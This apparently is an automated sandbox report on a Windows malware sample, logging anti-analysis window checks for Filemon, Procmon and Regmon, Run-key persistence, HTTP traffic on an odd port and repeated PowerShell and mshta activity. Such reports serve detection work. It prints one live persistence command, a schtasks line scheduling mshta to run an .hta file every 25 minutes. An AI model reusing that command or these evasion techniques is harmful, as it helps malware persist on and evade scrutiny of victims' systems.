Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Window searched: window name: PROCMON_WINDOW_CLASS

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn ajDhEmaEm2d /tr "mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta" /sc minute /mo 25 /ru "user" /f

Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 376bb929a5.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 376bb929a5.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 327981c77b.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 327981c77b.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1f8e467ee9.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1f8e467ee9.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 84b9c8b064.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 84b9c8b064.exe

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49785

Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CEF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00CEF98E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D61C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00D61C41

Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
